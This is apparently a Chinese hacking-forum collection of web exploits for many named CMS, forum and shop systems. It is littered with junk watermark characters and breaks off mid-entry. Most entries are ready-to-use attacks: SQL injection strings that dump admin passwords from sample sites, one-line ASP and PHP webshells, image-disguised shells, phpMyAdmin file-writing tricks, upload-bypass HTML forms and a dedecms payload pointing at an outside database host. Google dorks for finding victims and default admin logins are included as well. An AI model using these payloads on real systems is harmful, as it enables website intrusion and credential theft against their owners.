启航企业建站系统 cookie注入漏洞通杀所有版本
: \3 ?5 ?: N* u
8 ]! [" ^# i0 ?- x直接上exploit:
1 O9 h9 v2 F6 S7 kjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));6 @1 E# N6 T. j9 ?* v
test:http://www.tb11.net/system/xitong/shownews.asp?id=2109 d" k9 Y, w+ J- D g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- V) y2 a# G7 X1 Y- FAsprain论坛 注册用户 上传图片就可拿到webshell! z: b7 X" ^& K2 n
& E7 T' S3 m' U& s* c) X$ Y+ e' m/ U: nAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。& K7 A R2 L3 Q' m
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
$ P' ~; b o- F2.gif 为一小图片文件,一定要小,比如qq表情图片
& S: B5 F, p2 V2 F3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
6 a9 {6 |, O+ Y/ w: H% z4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了! x' W: x, y# U, q2 _7 Y$ N1 ^
5.q.asp;.gif" s4 K4 F- F, ^% h3 g
google:Powered by Asprain
0 F4 e2 W$ p# \. f* l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' ~# B% W- m+ G
7 }4 Y2 _% Z* h( u: b5 L8 Z' WShopNum1全部系统存在上传漏洞。
; q9 {) m) j0 u2 J! p% j
% `& ^: w# a3 G; s- L z首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
* T2 x) r+ }2 h. q8 `- m: p按说明 提示登录后台。。
( R+ N+ f9 k/ t3 j( N3 K在后台功能页面->附件管理->附件列表/ L3 M3 Y: T* j5 E5 G
可以直接上传.aspx 后缀木马
6 M0 Z: ]2 ]1 u% H3 }http://demo.shopnum1.com/upload/20110720083822500.aspx- W/ r7 a7 `$ r* K$ k- t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 S1 f/ B% V& W+ a' j( A3 G6 s1 j
6 s6 }/ ^& ]0 m2 W7 E6 F. B$ G; u牛牛CMS中小企业网站管理系统 上传漏洞6 `0 r$ v v8 I: n4 Z
0 x- ^* g0 t" L8 w" ]! z
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。) F7 g! K- J/ m H
后台:admin/login.asp' p* u2 o1 |5 ~1 G1 L) J
ewebeditor 5.5 Nday- \; \' r S: \; ^) N8 e
exp:; ?. \" r) |- [6 {, ^3 i
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?( ?4 ?# L$ w2 `' v" `9 U% F/ S
<input?type=file?name=uploadfile?size=100><br><br>?
1 x; y+ C8 d }% h<input?type=submit?value=upload>?3 {, m0 B$ V% k" k% H8 d
</form>
0 c4 q+ _4 a4 Cps:先上传小马.
c' A) x, g5 ~3 e/ rinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
8 t3 G! K5 }4 T; Z2 e
8 A. b8 t- X0 m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' o% R6 @) r8 @0 v/ E$ G1 O6 ]9 r
# @/ m+ _8 D: W A& `3 A$ T
YothCMS 遍历目录漏洞6 N# Y. {" E4 t, y
+ l: s3 F% j- o @* l优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
! B5 A# L- j6 [) u, T默认后台:admin/login.asp
% l1 O( D6 E& x; m" f- U遍历目录:5 L( o# U0 y" M: `0 X
ewebeditor/manage/upload.asp?id=1&dir=../0 R' C6 @4 D3 ]' L. Z" e
data:
& h& [3 _1 L8 z7 F! r2 K# t- _4 Uhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa& i, H7 e3 u- z" O V( S! }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- I! H5 |7 U( Y; e5 J1 K# @$ T) h0 P1 N4 g' i9 s
Net112企业建站系统 1.0 u4 B. H6 K! `) l: V/ h
' a9 }( m" A3 A/ v3 S0 a0 S: U
源码简介:
6 B6 E# T8 _& ]" i- aNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
! n6 f; ?! ]. B: s添加管理员:
' Q- p8 j" M$ C& Mhttp://www.0855.tv/admin/admin.asp?action=add&level=2' E/ T# F" C( M. |. h7 L' B
其实加不加都不是很重要,后台文件都没怎么作验证。
( @& Y |- L. y- Q上传路径:# a2 K! d1 f" r' ~
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
. O% [' F/ h* q% C8 I5 J6 ihttp://www.0855.tv/inc/Upfile.asp?Stype=2
1 ~" W$ D2 Y/ h怎么利用自己研究。 o+ H4 V* e; g' n3 _6 X
遍历目录:& G0 W V$ d) c+ p
http://www.0855.tv/admin/upfile.asp?path=../..& [2 A: ~3 r$ W( i l5 @ N
如:' z, S, H+ ?5 W
http://www.0855.tv/admin/upfile.asp?path=../admin
! D/ d2 w ]0 F1 @: l1 Q" Chttp://www.0855.tv/admin/upfile.asp?path=../data8 T7 s- v; J( W% [- G7 x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 O8 @) W; m' {; \0 C# n/ g4 j
7 Q+ U9 u5 p' U: _4 I6 `易和阳光购物商城通杀 上传漏洞
& F" f a9 w- w( \0 j/ ]3 T% W6 F/ S1 T, }5 J+ C" J$ r
前提要求是IIS6.0+asp坏境。% d' {$ c% f: ]
漏洞文件Iheeo_upfile.asp
) Z' b$ t: Z* P过滤不严.直接可以iis6.0上传- d# z% q X3 i" W% I
把ASP木马改成0855.asp;1.gif% E( F* B5 o+ D) E* L
直接放到明小子上传6 i) r$ z# n5 ?. k6 @. S; f
Google搜索:inurl:product.asp?Iheeoid=
5 Y0 _0 D- N* A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 k5 S% |: m$ J7 G2 j
" g2 w7 o8 `6 d$ V, s) j' fphpmyadmin后台4种拿shell方法7 K# p/ ~" p9 o- Z! a+ ?
7 h$ U; B2 o5 H/ L6 S0 L: E方法一:
7 d+ z- h7 n- d* B5 O) ZCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );1 A f$ S9 }4 N
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 l1 L& a+ @% w( m8 \2 y' oSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 q- _2 c* k( }& z0 f----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php, T/ t5 i5 ?5 X+ m0 c' ~9 A
一句话连接密码:xiaoma
# j+ c) Q: U" D- S* C/ L! ~6 O方法二:- x' z* E1 E$ e: v! j
Create TABLE xiaoma (xiaoma1 text NOT NULL);
: R# n) P q7 l- DInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');) D: G/ Q( c" I7 B2 H
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';3 [: D" U8 p! q" U9 E
Drop TABLE IF EXISTS xiaoma;% N1 L/ k# _0 P7 p x; b& v; {( ?
方法三:) k. a, B+ j$ f$ E
读取文件内容: select load_file('E:/xamp/www/s.php');
, h+ R$ R( W2 J. D写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 b1 d6 v8 a) \0 J0 ^" J
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'. \6 g) J" K$ w- A+ [8 t: t
方法四:" y! B, |5 H6 K) W8 y j
select load_file('E:/xamp/www/xiaoma.php');
1 z! a9 M4 \/ @select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'" m0 ]1 u5 q `* | |
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
+ y. u2 A8 {' b. L7 p. @ O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 }+ o: n" u: w
! ~+ K, H4 k- D d$ ]传信网络独立开发网站源码0day漏洞9 z3 M- F# U& l: b
& R% u7 Z* w/ w B& @/ a后台system/login.asp7 ]% w3 ^7 @7 B0 F
进了后台有个ewebeditor# q4 X5 o" n4 e+ y# K
Google 搜索inurl:product1.asp?tyc=
+ L% } h; O8 V& k" g' ]编辑器漏洞默认后台ubbcode/admin_login.asp& l8 M5 K/ x2 d, w2 T' R
数据库ubbcode/db/ewebeditor.mdb
Z2 ] O5 p1 k' X `4 P% P默认账号密码yzm 111111
( e& X7 u; @' K
5 ?. j# i ^& c; L, {" J2 K拿webshell方法
1 H1 J- k" ^6 h0 a b4 b2 ^, `- a登陆后台点击“样式管理”-选择新增样式
) W ~4 O. ~/ e/ i8 N6 R& ^7 F样式名称:scriptkiddies 随便写
2 g3 L% r6 W& N* R3 p路径模式:选择绝对路径
$ u: [: W* n. y8 L5 `/ u/ X: @图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx" H" D/ e9 |8 _: _1 \
图片类型比如就是我们要上传的ASP木马格式) G+ R- M; T& S: ]! u
上传路径:/" t! h- c n' B; Z! ]6 @
图片限制:写上1000 免的上不了我们的asp木马0 c+ D0 b# D1 D; A1 ]/ b
上传内容不要写, k1 h( _# W) [& R& A7 ?& ~
可以提交了
8 s) |, ?" H- z3 `' ~. ^样式增加成功!
$ N+ Q, R' {% E: h Y; S返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 . h5 C. A# @$ ?. `" k
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置, d1 ^. j4 z' g- X& p' g
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies0 G* }& v5 h, x. t2 O1 K% r
上ASP木马 回车 等到路径
1 Z5 i9 E# w, |1 t$ p3 T; C
, N" o; ~8 h1 Q* Y" O+ {后台:system/login.asp
5 ^! P" k" R9 n) Y6 }6 x3 S; ~6 ~Exp:! l: z+ q6 E& e, ?( Q) _$ s
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
a8 t3 j0 I a. ]0 D) L测试:0 Q4 B. {+ u7 G+ |0 c8 j: c7 u- m
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master# J. s( M2 n* Y6 R& T
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master- h2 d6 c. Q1 I3 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) Y3 c- Y+ m; I0 \" T) C
" e' @6 C8 k) f+ C5 V* | ]. ^foosun 0day 最新注入漏洞9 t/ E7 H# @0 w
5 |5 y4 y4 {$ Z$ C2 `8 O1 ]漏洞文件:www.xxx.com/user/SetNextOptions.asp
- ]; X" v( b5 u' X1 w利用简单的方法:3 m. P8 y& F! Z* ?, J
暴管理员帐号:
0 V1 i& C8 a3 h) Vhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
6 F) X0 b5 y' S4 z) U& ]2 O0 x暴管理员密码:
3 c( p% Q: a8 Y6 n( `7 H# H6 ohttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
- s+ W' T7 f0 _# I! |6 x5 g9 L6 ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 C8 l0 V. L4 i2 n) c" M# d
# g. W1 i, X1 N6 N- j7 N( z- f
网站程序的版权未知!
1 e! q+ [- I# E0 a, t# U- V
2 @9 K7 j8 q. ]0 [3 L2 q$ ?# ?5 g默认网站数据库: k, G/ T$ ~+ H* W. p7 n# K
www.i0day.com/data/nxnews.mdb9 W, c$ Z$ T, y' X$ t. x# |5 X5 @# m2 ^* e
ewebeditor 在线编辑器:, m. G$ ?3 @. j! `$ s+ z+ p
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
1 v4 M* _! Y w, D# O登录地址:ewebeditor/admin_login.asp" @0 Y! i6 L0 g! K; @0 r. y T* A8 h
默认密码:admin admin
2 H9 F3 X& M# h$ T2 O" X登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
) i4 i! l+ g0 h6 h( r- g# } r8 } z; t! f& P3 Y
Sql注入漏洞:9 H+ `9 b1 \' b
http://www.i0day.com/detail.asp?id=12
# _! B2 y/ `4 T( K9 e# d' |exp:
: ~7 ]+ ?; Y/ `8 H% O. Zunion select 1,admin,password,4,5,6,7,8 from admin* A. f L! G/ `, K
爆出明文帐号/密码2 e7 T8 ?) ^& C6 \: R8 _
# E- R" }/ a0 S' n( n- R
上传漏洞:) U+ [4 j. _7 s- N9 d. H
后台+upfile.asp
, ]4 f! h# q# V& ]# y% l1 Z( ~如:
" [0 N, Q4 h" {( l% ^http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ a: w3 X- |) l7 k" D0 i' Z) f) `shell的地址:网址+后台+成功上传的马' ?% n% ^2 ?3 q) j( X. M
google:inurl:news.asp?lanmuName=. m, p( ?' a- [
------------------------------------------------------------------------------------------------------------------------------------------------------------------------) v- A( t; I- c: e
; `; m1 z% W. P# M2 G1 m ]
dedecms最新0day利用不进后台直接拿WEBSHELL4 ?. E% b) K Y* X+ i7 M) I3 x$ e
; F$ T: v0 a3 p$ t% q; Q N" f/ @拿webshell的方法如下:1 p- r X& h* T8 O+ G$ R/ H
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
6 t( R7 G$ z8 b2 t9 H+ ~: \ d前题条件,必须准备好自己的dede数据库,然后插入数据:
- P+ X- ]. n$ n$ D/ Rinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); # T- ?. ]1 k3 X% B+ J, k$ m% r- J
) q3 w4 L8 M8 ^再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 C# W6 N7 V' z. I$ V( h( p$ n2 _<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) Z2 j% j: | Q3 x<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
7 _' O( I N' E' @( R) c7 o5 Z9 P<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. Z" {) T. x" I" K W) n3 R0 ^<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />$ I& m6 s( c6 P6 |! ]1 h% x2 E
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
. b) ]' Q/ @, r0 j<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) [$ L( c" p1 r+ o
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
) X0 o0 u, K/ X3 y& I<input type="text" value="true" name="nocache" style="width:400">* V# ^0 o: ^8 V- Y
<input type="submit" value="提交" name="QuickSearchBtn"><br />
" [( P1 c: h- U% ]) h; V7 |</form>
- L/ \! n3 i! }# E<script># n. E3 d5 _5 G$ o8 I
function addaction()
, D8 B U9 g. R( H% g{
* r' ^# r8 h, `6 U( Q: ~document.QuickSearch.action=document.QuickSearch.doaction.value;' l5 N3 h! C! |0 N5 e' F$ h
}
! C/ v. |$ j: r4 K</script>
0 G+ _2 d/ B! f9 }$ ?, w3 G-----------------------------------------------------------------------------------------------------------------------------------------------, h* ^$ O$ f0 |$ M1 l% z
* Y* {7 g h* C+ _3 u
dedecms织梦暴最新严重0day漏洞
. v, ]* K. a" s9 X$ z! B3 J2 Hbug被利用步骤如下:2 D* `* r9 m/ L3 C* T3 G7 ^
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
# D3 Z" f& N' p6 `# G把上面{}上的字母改为当前的验证码,即可直接进入网站后台。4 K8 h' N& l; L% ~5 I0 g, d
-------------------------------------------------------------------------------------------------------------------------------------------
* P* M* H0 u$ {' n
4 q, Z: h8 }4 }) Y6 y8 f j多多淘宝客程序上传漏洞 2 l. _: h8 N: ]3 b
漏洞页面:
9 l9 u3 |0 x7 X! ~admin\upload_pic.php
# X$ K/ G" b4 j1 ^传送门:
: N7 s, m+ V& q" u0 K) ehttp://www.www.com/admin/upload_pic.php?uploadtext=slide1+ B# | [' l( ^3 h2 z$ q* ^3 K
PS:copy张图片马 直接 xxx.php 上传抓包地址!8 h1 d5 B4 P$ L
------------------------------------------------------------------------------------------------------------------------------------------------------5 f) I3 b5 r: Q0 @$ g( ~
+ }. n6 U9 b) J+ s8 b4 r无忧公司系统ASP专业版后台上传漏洞
8 A9 l. M( s1 k漏洞文件 后台上传
1 `6 c; K& U# P7 T9 I4 w( aadmin/uploadPic.asp
& s3 w. {" Q7 W0 Y9 |) P漏洞利用 这个漏洞好像是雷池的4 k- }& C0 O& I, Q7 W
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
) m% r3 h# X! ^' k; S等到的webshell路径:
o+ |& V. U3 N. y$ S/UploadFiles/scriptkiddies.asp;_2.gif' v3 i: ~0 W( s
---------------------------------------------------------------------------------------------------------------------------------------------------
( z' P3 `# F( s0 w3 x" H8 I9 H4 [+ I
住哪酒店分销联盟系统2010
9 B3 H3 Y( t) \4 T- h9 TSearch:
$ ^. {9 P3 L2 y" [, b5 Ninurl:index.php?m=hotelinfo
y1 }1 K W9 N' W f% N# s% dhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
9 H$ L4 u: _: k默认后台:index.php?m=admin/login
6 ^( _% N+ a4 U! o1 V-------------------------------------------------------------------------------------------------------------------------------------------------- p: O4 G2 ]# H
( |; E+ \, K* T, F9 E* H( q6 p
inurl:info_Print.asp?ArticleID=* Q8 c6 M. Y7 ^! `. o
后台 ad_login.asp# l7 ?6 H: w! T! S6 b: j
爆管理员密码:9 U* a M. s) R, a
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin3 }" O' J h4 Q8 m, @) j# T+ Z* B
------------------------------------------------------------------------------------------------------------------------------------------------------------
) j% M g7 T; {% H1 L8 y2 n4 A6 ?' b! B/ f
搜索框漏洞!# j+ t7 N3 c9 F
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='* t$ l. I. | S
--------------------------------------------------------------------------------------------------------------------------------------------------------
) V; m" i! p, }7 J0 m2 \
, t% N2 n# Z9 I6 H关键字:: M/ [3 o/ A/ x3 ]
inurl:/reg_TemletSel.asp?step=2
8 m. @! f: e; b; T4 e8 o或者9 C% N8 f. D+ g6 W! O$ q
电子商务自助建站--您理想的助手2 ^3 Z! w0 A/ j2 x2 n
-------------------------------------------------------------------------------------------------------------------------------------------------# A& v Y# ^, d7 }9 g& n
" |. V, r1 {+ U" C/ c- k6 miGiveTest 2.1.0注入漏洞
9 t* @( J5 y6 N6 V' fVersion: <= 2.1.00 w2 W Y9 y, E5 g
# Homepage: http://iGiveTest.com/8 Q3 q! J6 P, P; O
谷歌关键字: “Powered by iGiveTest”
& H. T% F* ]4 T随便注册一个帐号。然后暴管理员帐号和密码; x1 o, s' `1 W# B6 T6 P! C9 ~
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
# {5 s$ b/ a; E5 J+ Q ?* n------------------------------------------------------------------------------------------------------------------------------------------------+ J2 H$ k0 L7 `' z, ~
, c/ ?1 I% A+ d8 E4 m2 I
CKXP网上书店注入漏洞9 z- W! D: ^+ _( o
工具加表:shop_admin 加字段:admin
% h- ` b4 j* q. ~后台:admin/login.asp / ?! I5 ]6 b* a3 W
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/1 R7 G) f! Z! ]! V5 ?3 P
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
4 I7 `; z, y2 x! k+ X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 P) U) o6 _9 }% A5 L5 L
. f/ U% B( N, B7 @) e. E段富超个人网站系统留言本写马漏洞 W$ M3 e4 k0 s8 \: q
源码下载:http://www.mycodes.net/24/2149.htm8 {, x8 M) Q! a# B+ U( l; e( M
addgbook.asp 提交一句话。$ K! \- X/ V; m5 v9 X, I
连接: http://www.xxxx.tv/date/date3f.asp L+ V/ b* g- P9 n: _1 l/ L# K
google:为防批量,特略!7 I; Z- B+ q3 Q( r0 x; @/ p8 `, \
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ m! G& R* Z5 @0 ~
" C# @. K5 Q& i4 X V: o智有道专业旅游系统v1.0 注入及列目录漏洞 D% L- n6 c. z) F
默认后台路径:/admin/login.asp7 r# I/ T# B3 F' |
默认管理员:admin
6 p3 y: G; E: N: {5 d默认密码:123456
. ~' A: |7 |' _. _: ZSQL EXP Tset:
1 O: X+ D3 l% k8 t* ?8 Ahttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin+ i A! l4 j. |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ a) A0 |8 ?% l$ m* L' T, m
& N s- L! q0 P& Pewebeditor(PHP) Ver 3.8 本任意文件上传0day
9 }! [, w$ P& j6 E- NEXP:
0 r( x* x; w, | M<title>eWebeditoR3.8 for php任意文件上EXP</title>
+ j! @% H; _, r) }( G `<form action="" method=post enctype="multip/ r# u5 d9 J( N V* A5 J, ?% X
art/form-data"> & ?1 _, x6 [0 E* G: U/ p
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> % |: q1 E b$ z5 a8 ] I
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> / s" q! n7 r A3 J1 m$ m* F
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ L" t# N1 m/ E7 B3 Wfile:<input type=file name="uploadfile"><br>
; Z+ I+ S7 Q! P<input type=button value=submit onclick=fsubmit()> q9 @ W9 C& _" d5 K" G
</form><br> - s8 w7 [, y: |- j* _, C
<script>
& P3 f+ @+ E* @! afunction fsubmit(){
1 ~3 X4 K7 H$ }/ Mform = document.forms[0];
: l7 W+ e& N- T' Oform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
! i% z9 _+ _1 r# ~( b: _2 jalert(form.action);
+ s% B' r- t( R% \form.submit();
" x5 {0 B' y( _3 Z K, T6 y}
* E3 _) _) n% d$ m0 ?</script>
- o& C& T( s4 \/ s5 k' ]0 O注意修改里面ewebeditor的名称还有路径。. g! l+ g% m; ?* j- Z7 F. U$ E, [3 o
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------* ~# Q, i7 K" O% ~4 C
/ h% w) n, a- R
提交’时提示ip被记录 防注入系统的利用: r$ D d7 ~2 R
网址:http://www.xxx.com/newslist.asp?id=122′
+ O7 Z: g0 L$ \- F' c; g# x- [0 j提示“你的操作已被记录!”等信息。
# w2 S+ S7 H7 X+ x- e9 y0 F; O3 Q' b利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。' _+ {7 n; [0 e4 G* U
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ]7 ^4 Z5 X7 |% x, u
, T3 J* C6 y- d; r西部商务网站管理系统 批量拿shell-0day
6 c1 g% Q6 Y9 t0 \( e这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ! N( y0 i4 E/ x, V6 _
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛/ C: O5 z0 O+ @
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合. D& \! t4 U/ F
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
8 _3 O( G2 W$ z1 u0 Y: S9 x0 a7 E---------------------------------------------------------------------------------------------------------------------------------------------------------------------------% s. D- L1 p/ n
8 J' U/ X( ~' ~% R; z1 [4 tJspRun!6.0 论坛管理后台注入漏洞
7 y7 K6 v8 T8 ~& f! o0 ~+ j2 S- M5 V
s. \+ `& u. p* h8 z. P) Z) ^6 wSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
5 z+ T' c4 }0 Y1 vJspRun!6.0 & r! W' O) K/ h' ]* Y- Q9 \
漏洞描述:
; Q$ w- v/ ^: e; hJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
: W$ ^: r7 s" I3 X& o* _$ R, f) U在处理后台提交的文件中ForumManageAction.java第1940行* g$ R( D9 C! ]% d+ `( U
String export = request.getParameter("export");//直接获取,没有安全过滤; Z1 d9 [2 \/ D$ s
if(export!=null){
& o" u% c k ~1 Y7 hList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
; ?$ a1 Q& U/ e* |7 zif(styles==null||styles.size()==0){! j( @0 K7 r v# v' e1 _( X
<*参考 f3 m- [0 J3 X+ o0 w
nuanfan@gmail.com3 b( K0 _5 t ~1 ~+ U) U
*> SEBUG安全建议:7 {6 n5 S8 n$ r
www.jsprun.net
# m4 q6 S3 d3 y0 ?3 Y(1)安全过滤变量export
6 h& M" ?5 i, \1 m(2)在查询语句中使用占位符5 v8 {3 e- { c# | W. n, I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* p! o* z( {" |8 v' }
$ `* m9 p* x* ]' F0 [乌邦图企业网站系统 cookies 注入4 w" r. Y% M0 r2 b$ x X
# k% K. B! h/ q. W3 G S程序完整登陆后台:/admin/login.asp
# T1 o6 [- O: r) R7 P& @7 M默认登陆帐号:admin 密码:admin8888 t9 B# f$ G! }
语句:(前面加个空格)+ k) j O" ?. Z; U& H4 S) r8 w
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
* i$ |, c0 K Z" l4 Y9 V( _或者是16个字段:
$ a! F& W! g R( Q- Rand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin9 M' p) K- Y# T# v+ s7 w' _7 o4 s
爆不出来自己猜字段。% V8 }8 p: U7 F* C3 a( F9 \
注入点:http://www.untnt.com/shownews.asp?=88; ~" B, {0 Q2 l* K
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp# s9 L' z! a9 a9 S; G
关键字:- x1 O( h; A9 q v2 L8 g
inurl:shownews?asp.id=8 E2 J& J. {6 i$ P* b3 G2 L. z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ l- S% a2 D+ P. O6 ~2 g8 w
! ^ z& p2 @6 H
CKXP网上书店注入漏洞
. O& u6 m$ T* k/ w# {& V) @
1 w* S5 r3 T: Z4 F7 y& Y工具加表:shop_admin 加字段:admin
, U1 }6 A H9 O5 R+ n后台:admin/login.asp
8 V1 J) U+ E6 |, Z1 q登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
0 j' ?! ^+ y/ u5 d# Minurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息9 i, k9 w/ [; D$ S, H% I. x
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ ^" ?. X8 Y0 T2 O3 N
, J* Y7 O% c B" {0 DYxShop易想购物商城4.7.1版本任意文件上传漏洞
; a) _2 I D7 K/ E, n
. X. c( Y, X, x3 {2 {2 fhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx- w- |$ ]/ i3 X, E
跳转到网站根目录上传任意文件。
5 |& K! y* F) H) X' u如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件+ z: R* ]- h9 g3 G% s
